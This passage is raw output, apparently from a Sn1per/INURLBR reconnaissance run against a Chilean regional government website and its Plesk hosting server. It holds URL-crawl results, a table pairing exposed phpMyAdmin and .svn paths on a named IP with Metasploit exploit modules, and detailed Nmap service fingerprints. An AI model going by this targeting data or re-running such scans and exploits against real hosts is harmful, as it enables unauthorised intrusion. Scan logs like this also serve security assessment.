4832|_[ + ] More details::
4833|_[ + ] Found:: UNIDENTIFIED
4834
4835 _[ - ]::--------------------------------------------------------------------------------------------------------------
4836|_[ + ] [ 79 / 100 ]-[17:37:39] [ - ]
4837|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/6porciento/2019/instructivo_general.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4838|_[ + ] Exploit::
4839|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4840|_[ + ] More details::
4841|_[ + ] Found:: UNIDENTIFIED
4842
4843 _[ - ]::--------------------------------------------------------------------------------------------------------------
4844|_[ + ] [ 80 / 100 ]-[17:37:43] [ - ]
4845|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/fic/2019/res_exe_0615_aprueba_bases_fic.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4846|_[ + ] Exploit::
4847|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4848|_[ + ] More details::
4849|_[ + ] Found:: UNIDENTIFIED
4850
4851 _[ - ]::--------------------------------------------------------------------------------------------------------------
4852|_[ + ] [ 81 / 100 ]-[17:37:47] [ - ]
4853|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/fic/2019/resultado_concurso_acuerdo_6164.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4854|_[ + ] Exploit::
4855|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4856|_[ + ] More details::
4857|_[ + ] Found:: UNIDENTIFIED
4858
4859 _[ - ]::--------------------------------------------------------------------------------------------------------------
4860|_[ + ] [ 82 / 100 ]-[17:37:50] [ - ]
4861|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/chatarrizacion/2019/res_exe_0974.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4862|_[ + ] Exploit::
4863|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4864|_[ + ] More details::
4865|_[ + ] Found:: UNIDENTIFIED
4866
4867 _[ - ]::--------------------------------------------------------------------------------------------------------------
4868|_[ + ] [ 83 / 100 ]-[17:37:51] [ - ]
4869|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/core/actas/2010/extraordinarias/actaextraordinaria180.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4870|_[ + ] Exploit::
4871|_[ + ] Information Server:: HTTP/2 200 , , IP:2a00:1450:4016:805::2001:443
4872|_[ + ] More details::
4873|_[ + ] Found:: UNIDENTIFIED
4874
4875 _[ - ]::--------------------------------------------------------------------------------------------------------------
4876|_[ + ] [ 84 / 100 ]-[17:37:56] [ - ]
4877|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/fic/2019/presentacion_bases.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4878|_[ + ] Exploit::
4879|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4880|_[ + ] More details::
4881|_[ + ] Found:: UNIDENTIFIED
4882
4883 _[ - ]::--------------------------------------------------------------------------------------------------------------
4884|_[ + ] [ 85 / 100 ]-[17:37:58] [ - ]
4885|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/docs/2020/fondes_circular_2020.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4886|_[ + ] Exploit::
4887|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4888|_[ + ] More details::
4889|_[ + ] Found:: UNIDENTIFIED
4890
4891 _[ - ]::--------------------------------------------------------------------------------------------------------------
4892|_[ + ] [ 86 / 100 ]-[17:38:00] [ - ]
4893|_[ + ] Target:: [ http://googleweblight.com/i?u=http://www.dellibertador.cl/diplan/2016/diario_el_rancaguino_15-02-2016.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4894|_[ + ] Exploit::
4895|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Search Click Proxy , IP:2a00:1450:4016:805::2001:80
4896|_[ + ] More details::
4897|_[ + ] Found:: UNIDENTIFIED
4898
4899 _[ - ]::--------------------------------------------------------------------------------------------------------------
4900|_[ + ] [ 87 / 100 ]-[17:38:02] [ - ]
4901|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/core/actas/2012/ordinarias/acta_ordinaria_443.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4902|_[ + ] Exploit::
4903|_[ + ] Information Server:: HTTP/2 200 , , IP:2a00:1450:4016:805::2001:443
4904|_[ + ] More details::
4905|_[ + ] Found:: UNIDENTIFIED
4906
4907 _[ - ]::--------------------------------------------------------------------------------------------------------------
4908|_[ + ] [ 88 / 100 ]-[17:38:05] [ - ]
4909|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/docs/2020/plan_recursos_hidricos_2020%E2%80%932029.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4910|_[ + ] Exploit::
4911|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4912|_[ + ] More details::
4913|_[ + ] Found:: UNIDENTIFIED
4914
4915 _[ - ]::--------------------------------------------------------------------------------------------------------------
4916|_[ + ] [ 89 / 100 ]-[17:38:07] [ - ]
4917|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/fic/2019/consultas.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4918|_[ + ] Exploit::
4919|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4920|_[ + ] More details::
4921|_[ + ] Found:: UNIDENTIFIED
4922
4923 _[ - ]::--------------------------------------------------------------------------------------------------------------
4924|_[ + ] [ 90 / 100 ]-[17:38:12] [ - ]
4925|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/noticias/noticias-gore/56-gobierno-inaugura-dos-modernos-edificios-de-salud&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4926|_[ + ] Exploit::
4927|_[ + ] Information Server:: HTTP/2 200 , , IP:2a00:1450:4016:805::2001:443
4928|_[ + ] More details::
4929|_[ + ] Found:: UNIDENTIFIED
4930
4931 _[ - ]::--------------------------------------------------------------------------------------------------------------
4932|_[ + ] [ 91 / 100 ]-[17:38:14] [ - ]
4933|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/fic/2019/listado_proyectos_admisibles.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4934|_[ + ] Exploit::
4935|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4936|_[ + ] More details::
4937|_[ + ] Found:: UNIDENTIFIED
4938
4939 _[ - ]::--------------------------------------------------------------------------------------------------------------
4940|_[ + ] [ 92 / 100 ]-[17:38:16] [ - ]
4941|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/fic/2019/listado_proyectos_elegibles.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4942|_[ + ] Exploit::
4943|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4944|_[ + ] More details::
4945|_[ + ] Found:: UNIDENTIFIED
4946
4947 _[ - ]::--------------------------------------------------------------------------------------------------------------
4948|_[ + ] [ 93 / 100 ]-[17:38:18] [ - ]
4949|_[ + ] Target:: [ http://googleweblight.com/i?u=http://www.dellibertador.cl/cultura_deporte_seguridad_2013/septiembre/aprobados_2dollamado2013_CULTURA_publico.html?ml=1&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4950|_[ + ] Exploit::
4951|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Search Click Proxy , IP:2a00:1450:4016:805::2001:80
4952|_[ + ] More details::
4953|_[ + ] Found:: UNIDENTIFIED
4954
4955 _[ - ]::--------------------------------------------------------------------------------------------------------------
4956|_[ + ] [ 94 / 100 ]-[17:38:21] [ - ]
4957|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/noticias/noticias-gobierno-regional/982-expomundorural-2015%E2%80%A6ven-a-vivir-el-campo.html&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4958|_[ + ] Exploit::
4959|_[ + ] Information Server:: HTTP/2 200 , , IP:2a00:1450:4016:805::2001:443
4960|_[ + ] More details::
4961|_[ + ] Found:: UNIDENTIFIED
4962
4963 _[ - ]::--------------------------------------------------------------------------------------------------------------
4964|_[ + ] [ 95 / 100 ]-[17:38:25] [ - ]
4965|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/6porciento/2019/adulto_mayor/financiados_adulto_mayor_2019.html&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4966|_[ + ] Exploit::
4967|_[ + ] Information Server:: HTTP/2 200 , , IP:2a00:1450:4016:805::2001:443
4968|_[ + ] More details::
4969|_[ + ] Found:: UNIDENTIFIED
4970
4971 _[ - ]::--------------------------------------------------------------------------------------------------------------
4972|_[ + ] [ 96 / 100 ]-[17:38:27] [ - ]
4973|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/6porciento/2020/alto_rendimiento/instructivo_alto_rendimiento.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4974|_[ + ] Exploit::
4975|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4976|_[ + ] More details::
4977|_[ + ] Found:: UNIDENTIFIED
4978
4979 _[ - ]::--------------------------------------------------------------------------------------------------------------
4980|_[ + ] [ 97 / 100 ]-[17:38:29] [ - ]
4981|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/docs/2020/fondes_requisitos_2020.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4982|_[ + ] Exploit::
4983|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4984|_[ + ] More details::
4985|_[ + ] Found:: UNIDENTIFIED
4986
4987 _[ - ]::--------------------------------------------------------------------------------------------------------------
4988|_[ + ] [ 98 / 100 ]-[17:38:31] [ - ]
4989|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/6porciento/2019/deporte/instructivo_deporte.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4990|_[ + ] Exploit::
4991|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
4992|_[ + ] More details::
4993|_[ + ] Found:: UNIDENTIFIED
4994
4995 _[ - ]::--------------------------------------------------------------------------------------------------------------
4996|_[ + ] [ 99 / 100 ]-[17:38:34] [ - ]
4997|_[ + ] Target:: [ https://googleweblight.com/i?u=https://www.dellibertador.cl/d3/images/6porciento/2020/1er_llamado/instructivo_cultura.pdf&grqid=nXZ9-wnT&s=1&hl=en-CA&f=1 ]
4998|_[ + ] Exploit::
4999|_[ + ] Information Server:: HTTP/2 302 , , IP:2a00:1450:4016:805::2001:443
5000|_[ + ] More details::
5001|_[ + ] Found:: UNIDENTIFIED
5002
5003[ INFO ] [ Shutting down ]
5004[ INFO ] [ End of process INURLBR at [12-03-2020 17:38:34]
5005[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
5006[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.dellibertador.cl/output/inurlbr-www.dellibertador.cl ]
5007|_________________________________________________________________________________________
5008
5009\_________________________________________________________________________________________/
5010####################################################################################################################################
5011+------------+-----------------------------------------+--------------------------------------------------+----------+----------+
5012| App Name | URL to Application | Potential Exploit | Username | Password |
5013+------------+-----------------------------------------+--------------------------------------------------+----------+----------+
5014| phpMyAdmin | https://200.54.230.247:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | None | None |
5015| phpMyAdmin | https://200.54.230.247:8443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | None | None |
5016| SVN | http://200.54.230.247:80/.svn/ | ./auxiliary/scanner/http/svn_wcdb_scanner.rb | None | None |
5017+------------+-----------------------------------------+--------------------------------------------------+----------+----------+
5018#####################################################################################################################################
5019Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:36 EDT
5020Warning: 200.54.230.247 giving up on port because retransmission cap hit (2).
5021Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5022Host is up (0.38s latency).
5023Not shown: 441 filtered ports, 21 closed ports
5024Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
5025PORT STATE SERVICE VERSION
502621/tcp open ftp ProFTPD
5027| ssl-cert: Subject: commonName=plesk.tdata.cloud
5028| Subject Alternative Name: DNS:plesk.tdata.cloud
5029| Not valid before: 2020-01-28T15:44:32
5030|_Not valid after: 2020-04-27T15:44:32
5031|_ssl-date: TLS randomness does not represent time
5032| tls-alpn:
5033|_ ftp
5034| tls-nextprotoneg:
5035|_ ftp
503622/tcp open ssh OpenSSH 7.4 (protocol 2.0)
5037| ssh-hostkey:
5038| 2048 a2:d5:9a:d1:54:5e:c6:d6:73:ff:76:5b:77:30:88:90 (RSA)
5039| 256 6a:1d:91:55:77:cb:45:e2:a4:90:53:35:d4:d0:36:7f (ECDSA)
5040|_ 256 68:99:17:75:71:2b:70:19:1b:0a:b3:45:38:da:71:63 (ED25519)
504125/tcp open smtp Postfix smtpd
5042|_smtp-commands: plesk.tdata.cloud, PIPELINING, SIZE 42188800, ETRN, STARTTLS, AUTH DIGEST-MD5 CRAM-MD5 PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
5043| ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
5044| Not valid before: 2019-11-29T14:59:31
5045|_Not valid after: 2020-11-28T14:59:31
5046|_ssl-date: TLS randomness does not represent time
504753/tcp open domain (unknown banner: none)
5048| dns-nsid:
5049|_ bind.version: none
5050| fingerprint-strings:
5051| DNSVersionBindReqTCP:
5052| version
5053| bind
5054|_ none
505580/tcp open http nginx
5056|_http-favicon: Parallels Plesk
5057|_http-title: Web Server's Default Page
5058110/tcp open pop3 Dovecot pop3d
5059|_pop3-capabilities: APOP USER AUTH-RESP-CODE TOP STLS CAPA RESP-CODES PIPELINING UIDL SASL(PLAIN LOGIN CRAM-MD5)
5060| ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
5061| Not valid before: 2019-11-29T14:59:31
5062|_Not valid after: 2020-11-28T14:59:31
5063|_ssl-date: TLS randomness does not represent time
5064143/tcp open imap Dovecot imapd
5065|_imap-capabilities: OK SASL-IR have IDLE ID IMAP4rev1 AUTH=PLAIN more AUTH=CRAM-MD5A0001 ENABLE listed LITERAL+ capabilities post-login STARTTLS AUTH=LOGIN LOGIN-REFERRALS Pre-login
5066| ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
5067| Not valid before: 2019-11-29T14:59:31
5068|_Not valid after: 2020-11-28T14:59:31
5069|_ssl-date: TLS randomness does not represent time
5070443/tcp open ssl/http nginx
5071|_http-title: 400 The plain HTTP request was sent to HTTPS port
5072| ssl-cert: Subject: commonName=plesk.tdata.cloud
5073| Subject Alternative Name: DNS:plesk.tdata.cloud
5074| Not valid before: 2020-01-28T15:44:32
5075|_Not valid after: 2020-04-27T15:44:32
5076|_ssl-date: TLS randomness does not represent time
5077| tls-alpn:
5078| h2
5079|_ http/1.1
5080| tls-nextprotoneg:
5081| h2
5082|_ http/1.1
5083465/tcp open ssl/smtp Postfix smtpd
5084|_smtp-commands: Couldn't establish connection on port 465
5085| ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
5086| Not valid before: 2019-11-29T14:59:31
5087|_Not valid after: 2020-11-28T14:59:31
5088|_ssl-date: TLS randomness does not represent time
5089587/tcp open smtp Postfix smtpd
5090|_smtp-commands: plesk.tdata.cloud, PIPELINING, SIZE 42188800, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
5091| ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
5092| Not valid before: 2019-11-29T14:59:31
5093|_Not valid after: 2020-11-28T14:59:31
5094|_ssl-date: TLS randomness does not represent time
5095993/tcp open ssl/imap Dovecot imapd
5096| ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
5097| Not valid before: 2019-11-29T14:59:31
5098|_Not valid after: 2020-11-28T14:59:31
5099|_ssl-date: TLS randomness does not represent time
5100995/tcp open ssl/pop3 Dovecot pop3d
5101| ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
5102| Not valid before: 2019-11-29T14:59:31
5103|_Not valid after: 2020-11-28T14:59:31
5104|_ssl-date: TLS randomness does not represent time
51058443/tcp open ssl/https-alt sw-cp-server
5106| fingerprint-strings:
5107| GetRequest:
5108| HTTP/1.1 200 OK
5109| Server: sw-cp-server
5110| Date: Thu, 12 Mar 2020 20:36:32 GMT
5111| Content-Type: text/html; charset=UTF-8
5112| Connection: close
5113| Expires: Fri, 28 May 1999 00:00:00 GMT
5114| Last-Modified: Thu, 12 Mar 2020 20:36:32 GMT
5115| Cache-Control: no-store, no-cache, must-revalidate
5116| Cache-Control: post-check=0, pre-check=0
5117| Pragma: no-cache
5118| P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
5119| X-Frame-Options: SAMEORIGIN
5120| X-XSS-Protection: 1; mode=block
5121| <html><head>
5122| <meta charset="utf-8">
5123| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
5124| <meta name="plesk-build" content="1800200215.00">
5125| <title>Plesk Obsidian 18.0.24</title>
5126| <script language="javascript" type="text/javascript" src="/cp/javascript/externals/prototype.js?1581675273"/></script>
5127| </head><body onLoad=";top.location='/login.php?success_redirect_url=%2F';"></b
5128| HTTPOptions:
5129| HTTP/1.1 405 Not Allowed
5130| Server: sw-cp-server
5131| Date: Thu, 12 Mar 2020 20:36:34 GMT
5132| Content-Type: text/html
5133| Content-Length: 929
5134| Connection: close
5135| ETag: "5e46d8aa-3a1"
5136| <!DOCTYPE html>
5137| <html lang="en" dir="ltr">
5138| <head>
5139| <meta charset="utf-8">
5140| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
5141| <title>405 Method Not Allowed</title>
5142| <link rel="shortcut icon" href="/favicon.ico">
5143| <link rel="stylesheet" href="/ui-library/plesk-ui-library.css?3.5.0">
5144| <script type="text/javascript" src="/ui-library/plesk-ui-library.min.js?3.5.0"></script>
5145| <script type="text/javascript" src="/cp/javascript/vendors.js"></script>
5146| <script type="text/javascript" src="/cp/javascript/main.js"></script>
5147| <script type="text/javascript" src="/error_docs/uat.js?v1"></script>
5148| <link href="/error_docs/app.css" rel="stylesheet"></head>
5149| <body>
5150|_ <div id="
5151|_http-server-header: sw-cp-server
5152| http-title: Plesk Obsidian 18.0.24
5153|_Requested resource was https://plesk.tdata.cloud:8443/
5154| ssl-cert: Subject: commonName=plesk.tdata.cloud
5155| Subject Alternative Name: DNS:plesk.tdata.cloud
5156| Not valid before: 2020-01-28T15:44:32
5157|_Not valid after: 2020-04-27T15:44:32
5158|_ssl-date: TLS randomness does not represent time
5159| tls-alpn:
5160|_ http/1.1
5161| tls-nextprotoneg:
5162|_ http/1.1
51638880/tcp open cddbp-alt?
5164| fingerprint-strings:
5165| FourOhFourRequest:
5166| HTTP/1.1 404 Not Found
5167| Server: sw-cp-server
5168| Date: Thu, 12 Mar 2020 20:36:24 GMT
5169| Content-Type: text/html
5170| Content-Length: 921
5171| Connection: close
5172| ETag: "5e46d8aa-399"
5173| <!DOCTYPE html>
5174| <html lang="en" dir="ltr">
5175| <head>
5176| <meta charset="utf-8">
5177| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
5178| <title>404 Page Not Found</title>
5179| <link rel="shortcut icon" href="/favicon.ico">
5180| <link rel="stylesheet" href="/ui-library/plesk-ui-library.css?3.5.0">
5181| <script type="text/javascript" src="/ui-library/plesk-ui-library.min.js?3.5.0"></script>
5182| <script type="text/javascript" src="/cp/javascript/vendors.js"></script>
5183| <script type="text/javascript" src="/cp/javascript/main.js"></script>
5184| <script type="text/javascript" src="/error_docs/uat.js?v1"></script>
5185| <link href="/error_docs/app.css" rel="stylesheet"></head>
5186| <body>
5187| <div id="app"><
5188| GetRequest:
5189| HTTP/1.1 200 OK
5190| Server: sw-cp-server
5191| Date: Thu, 12 Mar 2020 20:36:24 GMT
5192| Content-Type: text/html; charset=UTF-8
5193| Connection: close
5194| Expires: Fri, 28 May 1999 00:00:00 GMT
5195| Last-Modified: Thu, 12 Mar 2020 20:36:24 GMT
5196| Cache-Control: no-store, no-cache, must-revalidate
5197| Cache-Control: post-check=0, pre-check=0
5198| Pragma: no-cache
5199| P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
5200| X-Frame-Options: SAMEORIGIN
5201| X-XSS-Protection: 1; mode=block
5202| <html><head>
5203| <meta charset="utf-8">
5204| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
5205| <meta name="plesk-build" content="1800200215.00">
5206| <title>Plesk Obsidian 18.0.24</title>
5207| <script language="javascript" type="text/javascript" src="/cp/javascript/externals/prototype.js?1581675273"/></script>
5208|_ </head><body onLoad=";top.location='/login.php?success_redirect_url=%2F';"></b
52093 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
5210==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
5211SF-Port53-TCP:V=7.80%I=7%D=3/12%Time=5E6A9D51%P=x86_64-pc-linux-gnu%r(DNSV
5212SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
5213SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
5214SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
5215==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
5216SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=3/12%Time=5E6A9D55%P=x86_64-pc-linux-gn
5217SF:u%r(GetRequest,689,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20sw-cp-server\r
5218SF:\nDate:\x20Thu,\x2012\x20Mar\x202020\x2020:36:32\x20GMT\r\nContent-Type
5219SF::\x20text/html;\x20charset=UTF-8\r\nConnection:\x20close\r\nExpires:\x2
5220SF:0Fri,\x2028\x20May\x201999\x2000:00:00\x20GMT\r\nLast-Modified:\x20Thu,
5221SF:\x2012\x20Mar\x202020\x2020:36:32\x20GMT\r\nCache-Control:\x20no-store,
5222SF:\x20no-cache,\x20must-revalidate\r\nCache-Control:\x20post-check=0,\x20
5223SF:pre-check=0\r\nPragma:\x20no-cache\r\nP3P:\x20CP=\"NON\x20COR\x20CURa\x
5224SF:20ADMa\x20OUR\x20NOR\x20UNI\x20COM\x20NAV\x20STA\"\r\nX-Frame-Options:\
5225SF:x20SAMEORIGIN\r\nX-XSS-Protection:\x201;\x20mode=block\r\n\r\n\n\x20\x2
5226SF:0\x20\x20\x20\x20\x20\x20<html><head>\n\x20\x20\x20\x20\x20\x20\x20\x20
5227SF:<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20h
5228SF:ttp-equiv=\"X-UA-Compatible\"\x20content=\"IE=edge,chrome=1\">\n\x20\x2
5229SF:0\x20\x20\x20\x20\x20\x20<meta\x20name=\"plesk-build\"\x20content=\"180
5230SF:0200215\.00\">\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Plesk\x20Obsidia
5231SF:n\x2018\.0\.24</title>\n\x20\x20\x20\x20\x20\x20\x20\x20<script\x20lang
5232SF:uage=\"javascript\"\x20type=\"text/javascript\"\x20src=\"/cp/javascript
5233SF:/externals/prototype\.js\?1581675273\"/></script>\n\x20\x20\x20\x20\x20
5234SF:\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20</head><body\x20onLoad=\"
5235SF:;top\.location='/login\.php\?success_redirect_url=%2F';\"></b")%r(HTTPO
5236SF:ptions,44F,"HTTP/1\.1\x20405\x20Not\x20Allowed\r\nServer:\x20sw-cp-serv
5237SF:er\r\nDate:\x20Thu,\x2012\x20Mar\x202020\x2020:36:34\x20GMT\r\nContent-
5238SF:Type:\x20text/html\r\nContent-Length:\x20929\r\nConnection:\x20close\r\
5239SF:nETag:\x20\"5e46d8aa-3a1\"\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"e
5240SF:n\"\x20dir=\"ltr\">\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\"
5241SF:>\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device
5242SF:-width,\x20initial-scale=1,\x20shrink-to-fit=no\">\n\x20\x20\x20\x20<ti
5243SF:tle>405\x20Method\x20Not\x20Allowed</title>\n\x20\x20\x20\x20<link\x20r
5244SF:el=\"shortcut\x20icon\"\x20href=\"/favicon\.ico\">\n\x20\x20\x20\x20<li
5245SF:nk\x20rel=\"stylesheet\"\x20href=\"/ui-library/plesk-ui-library\.css\?3
5246SF:\.5\.0\">\n\x20\x20\x20\x20<script\x20type=\"text/javascript\"\x20src=\
5247SF:"/ui-library/plesk-ui-library\.min\.js\?3\.5\.0\"></script>\n\x20\x20\x
5248SF:20\x20<script\x20type=\"text/javascript\"\x20src=\"/cp/javascript/vendo
5249SF:rs\.js\"></script>\n\x20\x20\x20\x20<script\x20type=\"text/javascript\"
5250SF:\x20src=\"/cp/javascript/main\.js\"></script>\n\x20\x20\x20\x20<script\
5251SF:x20type=\"text/javascript\"\x20src=\"/error_docs/uat\.js\?v1\"></script
5252SF:>\n<link\x20href=\"/error_docs/app\.css\"\x20rel=\"stylesheet\"></head>
5253SF:\n<body>\n<div\x20id=\"");
5254==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
5255SF-Port8880-TCP:V=7.80%I=7%D=3/12%Time=5E6A9D4C%P=x86_64-pc-linux-gnu%r(Ge
5256SF:tRequest,689,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20sw-cp-server\r\nDate
5257SF::\x20Thu,\x2012\x20Mar\x202020\x2020:36:24\x20GMT\r\nContent-Type:\x20t
5258SF:ext/html;\x20charset=UTF-8\r\nConnection:\x20close\r\nExpires:\x20Fri,\
5259SF:x2028\x20May\x201999\x2000:00:00\x20GMT\r\nLast-Modified:\x20Thu,\x2012
5260SF:\x20Mar\x202020\x2020:36:24\x20GMT\r\nCache-Control:\x20no-store,\x20no
5261SF:-cache,\x20must-revalidate\r\nCache-Control:\x20post-check=0,\x20pre-ch
5262SF:eck=0\r\nPragma:\x20no-cache\r\nP3P:\x20CP=\"NON\x20COR\x20CURa\x20ADMa
5263SF:\x20OUR\x20NOR\x20UNI\x20COM\x20NAV\x20STA\"\r\nX-Frame-Options:\x20SAM
5264SF:EORIGIN\r\nX-XSS-Protection:\x201;\x20mode=block\r\n\r\n\n\x20\x20\x20\
5265SF:x20\x20\x20\x20\x20<html><head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\
5266SF:x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-eq
5267SF:uiv=\"X-UA-Compatible\"\x20content=\"IE=edge,chrome=1\">\n\x20\x20\x20\
5268SF:x20\x20\x20\x20\x20<meta\x20name=\"plesk-build\"\x20content=\"180020021
5269SF:5\.00\">\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Plesk\x20Obsidian\x201
5270SF:8\.0\.24</title>\n\x20\x20\x20\x20\x20\x20\x20\x20<script\x20language=\
5271SF:"javascript\"\x20type=\"text/javascript\"\x20src=\"/cp/javascript/exter
5272SF:nals/prototype\.js\?1581675273\"/></script>\n\x20\x20\x20\x20\x20\x20\x
5273SF:20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20</head><body\x20onLoad=\";top\.
5274SF:location='/login\.php\?success_redirect_url=%2F';\"></b")%r(FourOhFourR
5275SF:equest,445,"HTTP/1\.1\x20404\x20Not\x20Found\r\nServer:\x20sw-cp-server
5276SF:\r\nDate:\x20Thu,\x2012\x20Mar\x202020\x2020:36:24\x20GMT\r\nContent-Ty
5277SF:pe:\x20text/html\r\nContent-Length:\x20921\r\nConnection:\x20close\r\nE
5278SF:Tag:\x20\"5e46d8aa-399\"\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\
5279SF:"\x20dir=\"ltr\">\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\
5280SF:n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-w
5281SF:idth,\x20initial-scale=1,\x20shrink-to-fit=no\">\n\x20\x20\x20\x20<titl
5282SF:e>404\x20Page\x20Not\x20Found</title>\n\x20\x20\x20\x20<link\x20rel=\"s
5283SF:hortcut\x20icon\"\x20href=\"/favicon\.ico\">\n\x20\x20\x20\x20<link\x20
5284SF:rel=\"stylesheet\"\x20href=\"/ui-library/plesk-ui-library\.css\?3\.5\.0
5285SF:\">\n\x20\x20\x20\x20<script\x20type=\"text/javascript\"\x20src=\"/ui-l
